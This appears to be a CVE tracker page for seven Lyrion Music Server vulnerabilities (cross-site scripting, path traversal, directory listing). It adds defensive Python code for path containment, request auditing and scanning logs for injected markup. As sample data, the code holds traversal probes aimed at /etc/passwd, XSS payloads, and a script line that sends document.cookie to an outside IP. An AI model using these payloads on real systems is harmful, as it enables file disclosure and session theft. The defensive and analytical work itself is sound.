Lyrion Music Server

7 CVEs tracked for this product

CVE-2026-50235 MEDIUM This Month

Reflected cross-site scripting in Lyrion Music Server 9.2.0 allows unauthenticated remote attackers to inject arbitrary JavaScript into victims' browsers via unsanitized advanced search parameters, enabling session token theft and account hijacking with a single user click on a crafted link. The changed scope (S:C) in the CVSS 3.x vector does not mean the script escapes the application's origin; it means the impact lands in the victim's browser, a component distinct from the vulnerable server. The injected script runs in the origin of the Lyrion web interface, which is exactly what lets it read that origin's cookies and call its management endpoints. (Scope is not a CVSS 4.0 metric; the 5.1 on this card is the CVSS 4.0 base score.) No public exploit identified at time of analysis and no CISA KEV listing, but the Zero Science Lab advisory reference is a known PoC-publishing outlet, so PoC availability should be treated as likely pending confirmation.

XSS | Lyrion Music Server | Sources: NVD, VulDB | CVSS 4.0: 5.1 | EPSS: 0.0%
CVE-2026-50234 HIGH This Week

Unauthenticated arbitrary file read in Lyrion Music Server 9.2.0 allows remote attackers to retrieve sensitive files from the host by manipulating directory traversal sequences in file path parameters handled by the embedded web server. The flaw is network-reachable with no authentication or user interaction required, and publicly available exploit code exists via the Zero Science Lab advisory ZSL-2026-5992. There is no CISA KEV listing and the EPSS score is low (0.4%), so widespread opportunistic exploitation has not been confirmed, but the low barrier to abuse makes opportunistic scanning likely; any instance whose web interface is reachable from an untrusted network should be treated as exposed until patched.

Path Traversal | Lyrion Music Server | Sources: NVD, VulDB | CVSS 4.0: 8.7 | EPSS: 0.4%
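The traversal class described above comes down to one missing containment check in the file-serving handler. The following is an added example, not Lyrion Music Server code and not the ZSL advisory's exploit: it puts the traversal-prone concatenation pattern beside a hardened resolver, and adds a helper for spotting traversal probes in access logs. The library root `/srv/music`, the sample requests and the decoding rules (double percent-decoding, backslash as separator) are assumptions made for the example.

```python
"""Path-traversal guard for a file-serving handler.

Added illustration, not Lyrion Music Server code. The library root, the
parameter values and the sample requests are assumptions made for the example.
"""
import re
from pathlib import Path
from typing import List, Optional
from urllib.parse import unquote

MEDIA_ROOT = Path("/srv/music")  # assumed library root; the real value comes from server config


def _segments(requested: str) -> List[str]:
    """Decode a client-supplied path and split it into cleaned segments.

    unquote() is applied twice so a double-encoded %252e%252e is seen as '..'.
    Both '/' and '\\' are treated as separators so '..\\..' is not missed.
    """
    decoded = unquote(unquote(requested))
    return [s for s in re.split(r"[\\/]+", decoded) if s not in ("", ".")]


def looks_like_traversal(requested: str) -> bool:
    """True if the raw parameter contains a '..' segment or a NUL byte after decoding.

    Suitable for scanning access-log entries for probes against the file endpoint.
    """
    decoded = unquote(unquote(requested))
    return "\x00" in decoded or ".." in _segments(requested)


def vulnerable_resolve(root: Path, requested: str) -> Path:
    """The traversal-prone pattern: string concatenation with no containment check."""
    return Path(str(root) + "/" + requested)


def safe_resolve(root: Path, requested: str) -> Optional[Path]:
    """Return the file under root that `requested` names, or None if it escapes.

    Rejects rather than clamps: a '..' in a media path is never legitimate, so
    surfacing it is more useful than silently serving a different file.
    The final relative_to() check also catches escapes via symlinks inside root.
    """
    if looks_like_traversal(requested):
        return None
    candidate = root.joinpath(*_segments(requested)).resolve(strict=False)
    try:
        candidate.relative_to(root.resolve(strict=False))
    except ValueError:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed probes: one legitimate request and four traversal variants.
    probes = ["Album/01 - Track.flac", "../../../../etc/passwd",
              "%2e%2e%2f%2e%2e%2fetc%2fpasswd", "%252e%252e/etc/passwd",
              "..\\..\\windows\\win.ini"]
    for p in probes:
        print(f"{p!r:40} vulnerable -> {vulnerable_resolve(MEDIA_ROOT, p)}")
        print(f"{'':40} safe       -> {safe_resolve(MEDIA_ROOT, p)}")
```

The resolver deliberately returns `None` instead of normalising `..` away: clamping a traversal attempt into the root hides the probe from the operator, while rejecting it gives the access log a clean signal to alert on.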
CVE-2026-50233 MEDIUM This Month

Arbitrary filesystem directory listing in Lyrion Music Server 9.2.0 exposes any host directory to remote unauthenticated attackers via the readdirectory query, which accepts an unsandboxed folder parameter with no path restriction. Both the CLI service on TCP port 9090 and the HTTP JSON-RPC endpoint at /jsonrpc.js are affected, presenting a dual-protocol attack surface that requires no credentials in the default configuration. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the trivial attack complexity - a single unauthenticated network request - significantly lowers the real-world barrier to abuse.

Information Disclosure | Lyrion Music Server | Sources: NVD, VulDB | CVSS 4.0: 6.9 | EPSS: 0.0%
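Because the same readdirectory command is reachable over the CLI on TCP 9090 and over the JSON-RPC endpoint at /jsonrpc.js, a practitioner checking captured traffic (or designing the server-side fix) needs to pull the folder argument out of both encodings and test it against the configured library roots. The following is an added example, not Lyrion Music Server code: the allowed roots and all sample requests are constructed, and the exact wire formats (a space-separated CLI line with percent-encoded values, and a JSON-RPC body whose params are [player_id, [command, args...]]) are assumptions for the example.

```python
"""Audit readdirectory requests on both Lyrion channels against the configured library roots.

Added illustration, not Lyrion Music Server code. The allowed roots and the
sample requests are constructed; the wire formats (space-separated CLI line on
TCP 9090 with percent-encoded values, and a JSON-RPC body for /jsonrpc.js whose
params are [player_id, [command, args...]]) are assumptions made here.
"""
import json
import posixpath
from pathlib import PurePosixPath
from typing import Any, Dict, List, Optional, Tuple, Union
from urllib.parse import unquote

ALLOWED_ROOTS = [PurePosixPath("/srv/music"), PurePosixPath("/srv/playlists")]  # assumed config


def readdirectory_folder(request: Union[str, Dict[str, Any]]) -> Optional[Tuple[str, Optional[str]]]:
    """Return (channel, folder) for a readdirectory request, or None for any other command."""
    if isinstance(request, dict):
        params = request.get("params")
        if not (isinstance(params, list) and len(params) == 2 and isinstance(params[1], list)):
            return None
        cmd = params[1]
        if not cmd or cmd[0] != "readdirectory":
            return None
        channel, args = "jsonrpc", [str(a) for a in cmd[1:]]
    else:
        parts = request.strip().split()
        if not parts or parts[0] != "readdirectory":
            return None
        channel, args = "cli", parts[1:]
    folder = None
    for arg in args:
        if arg.startswith("folder:"):
            folder = unquote(arg[len("folder:"):])  # CLI tag values are assumed percent-encoded
    return channel, folder


def folder_allowed(folder: Optional[str], roots: List[PurePosixPath] = ALLOWED_ROOTS) -> bool:
    """True only if the normalised folder is one of the roots or lies below one.

    normpath() collapses '..' first, so '/srv/music/../../etc' is judged as '/etc'.
    A missing folder is treated as disallowed: listing with no root given is never
    something the web UI needs.
    """
    if folder is None:
        return False
    path = PurePosixPath(posixpath.normpath(folder))
    if not path.is_absolute():
        return False
    return any(path == root or root in path.parents for root in roots)


def audit(requests: List[str]) -> List[Dict[str, Any]]:
    """Classify every readdirectory request; traffic for other commands is skipped."""
    findings = []
    for raw in requests:
        req = json.loads(raw) if raw.lstrip().startswith("{") else raw
        parsed = readdirectory_folder(req)
        if parsed is None:
            continue
        channel, folder = parsed
        findings.append({"channel": channel, "folder": folder,
                         "verdict": "allowed" if folder_allowed(folder) else "flagged"})
    return findings


# Constructed sample traffic: two CLI lines, two JSON-RPC bodies, one CLI line with no folder.
SAMPLE_REQUESTS = [
    "readdirectory 0 100 folder:%2Fsrv%2Fmusic%2FAlbum",
    "readdirectory 0 100 folder:%2Fetc",
    json.dumps({"id": 1, "method": "slim.request",
                "params": ["", ["readdirectory", 0, 100, "folder:/srv/music/../../root"]]}),
    json.dumps({"id": 2, "method": "slim.request",
                "params": ["00:04:20:aa:bb:cc", ["status", "-", 1]]}),
    "readdirectory 0 50",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_REQUESTS):
        print(finding)
```

Run against a packet capture of port 9090 and the request bodies posted to /jsonrpc.js, every "flagged" row is a directory listing outside the library; the same `folder_allowed` predicate is the shape of check the server itself needs before it touches the filesystem.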
CVE-2026-50232 MEDIUM This Month

Stored cross-site scripting in Lyrion Music Server 9.2.0 allows remote attackers to inject JavaScript payloads via media file metadata fields (GENRE, ARTIST, ALBUM) that execute when other users browse the web interface; the attacker needs only a way to get a crafted tagged file into the scanned library. The 7.2 score carries a changed scope (S:C), reflecting that the impact lands in the viewing user's browser rather than in the server itself (the 5.1 on this card is the CVSS 4.0 base score, which has no scope metric), and successful exploitation can reach management functions and disclose settings. No public exploit identified at time of analysis, and no CISA KEV listing.

XSS | Lyrion Music Server | Sources: NVD, VulDB | CVSS 4.0: 5.1 | EPSS: 0.0%
CVE-2026-50231 MEDIUM This Month

Stored cross-site scripting in Lyrion Music Server 9.2.0's log viewer allows unauthenticated remote attackers to inject persistent JavaScript via unescaped template variables, executing arbitrary scripts in the browsers of administrators or other users who view the logs. Injection vectors include the search, lines, and path query parameters as well as indirect channels such as URLs, User-Agent headers, stream titles, and player names that get written to the server log. The indirect channels are what make this more than a reflected bug: anything that causes the server to write attacker-controlled text to its log, such as a single request carrying a crafted User-Agent, becomes a persistent payload that fires the next time someone opens the log viewer. No public exploit identified at time of analysis, but the 7.2 score reflects a changed scope (S:C) because the impact lands in the viewing user's browser rather than in the server itself (the 5.1 on this card is the CVSS 4.0 base score).

XSS | Lyrion Music Server | Sources: NVD, VulDB | CVSS 4.0: 5.1 | EPSS: 0.0%
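Given the indirect channels listed above, an operator of a 9.2.0 instance cannot tell from the web UI alone whether the log has already been seeded; the file itself has to be scanned. The following is an added example, not Lyrion Music Server code: it percent-decodes each log line, looks for tags and event-handler attributes that have no business in a media server log, and attributes each hit to a likely channel. The log lines are constructed for the example and only loosely imitate a "[timestamp] module (pid) message" layout; the channel attribution is a heuristic on that constructed text, not knowledge of Lyrion's real log format.

```python
"""Scan a Lyrion-style server log for injected markup (log poisoning).

Added illustration, not Lyrion Music Server code. The log lines below are
constructed for the example; channel attribution is a heuristic keyed on the
text those constructed lines carry, not on Lyrion's actual log layout.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Tags and attributes that have no business appearing in a media server log.
MARKUP = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed|body|a|style)\b"
    r"|\bon(error|load|click|mouseover|focus|mouseenter)\s*="
    r"|javascript\s*:",
    re.IGNORECASE,
)

# Heuristic markers for where the attacker-controlled text entered the log.
CHANNELS = [
    ("User-Agent:", "user-agent header"),
    ("Player name", "player name"),
    ("/server.log?", "log viewer query parameter"),
    ("title", "stream title"),
]


def find_injected_markup(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line containing markup, after percent-decoding.

    Decoding matters: a request line such as /server.log?search=%3Csvg... is
    stored encoded but renders decoded when the log viewer reflects it.
    """
    findings = []
    for idx, line in enumerate(lines):
        decoded = unquote(line)
        match = MARKUP.search(decoded)
        if not match:
            continue
        channel = next((name for marker, name in CHANNELS if marker in line), "unknown")
        findings.append({"line": idx, "match": match.group(0), "channel": channel})
    return findings


# Constructed sample log: one clean request, three poisoned lines, one scanner message.
SAMPLE_LOG = [
    "[26-02-03 10:12:01.001] Slim::Web::HTTP::processHTTP (412) Processing GET /status.html from 192.0.2.10",
    "[26-02-03 10:12:05.220] Slim::Web::HTTP::processHTTP (412) User-Agent: Mozilla/5.0 "
    "<script>fetch('//203.0.113.5/?c='+document.cookie)</script>",
    "[26-02-03 10:13:40.008] Slim::Player::Client (88) Player name set to: <img src=x onerror=alert(1)>",
    "[26-02-03 10:14:02.550] Slim::Web::HTTP::processHTTP (412) Processing GET "
    "/server.log?search=%3Csvg%20onload%3Dalert%281%29%3E from 198.51.100.7",
    "[26-02-03 10:15:00.000] Slim::Music::Import (9) Scan finished, 12034 tracks",
]

if __name__ == "__main__":
    for finding in find_injected_markup(SAMPLE_LOG):
        print(finding)
```

A hit in the log is evidence of an attempt, not proof of execution; the payload only runs when a user opens the log viewer on an unpatched build. Rotating or truncating the log removes the stored payload but does not close the injection path, so treat the scan as triage, not remediation.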
CVE-2026-50230 MEDIUM POC This Month

Reflected cross-site scripting in Lyrion Music Server 9.2.0 allows a remote unauthenticated attacker to inject and execute arbitrary JavaScript in a victim's browser by tricking them into visiting a crafted URL targeting the server.log endpoint's search parameter. The vulnerability carries a changed scope (S:C in the CVSS 3.x vector), meaning the impact lands in the victim's browser as a component distinct from the server, while the script itself executes in the context of the affected application's origin, enabling session theft, credential harvesting, or UI redressing against users of the media server interface. The entry is tagged POC: the advisory was published to zeroscience.mk, a research outlet that routinely accompanies disclosures with proof-of-concept code, although no public exploit was independently confirmed at time of analysis and no KEV listing exists.

XSS | Lyrion Music Server | Sources: NVD, VulDB | CVSS 4.0: 5.1 | EPSS: 0.0%
CVE-2025-65229 MEDIUM This Month

A stored cross-site scripting (XSS) vulnerability exists in the web interface of Lyrion Music Server <= 9.0.3. An authenticated user with access to Settings > Player can save arbitrary HTML/JavaScript in the Player name field. That value is stored by the server and later rendered without proper output encoding on the Information (Player Info) tab, causing the script to execute in the context of any user viewing that page. Unlike the unauthenticated 9.2.0 issues above, this one requires an account with access to player settings.

XSS | Lyrion Music Server | Sources: NVD, GitHub | CVSS 3.1: 4.6 | EPSS: 0.0%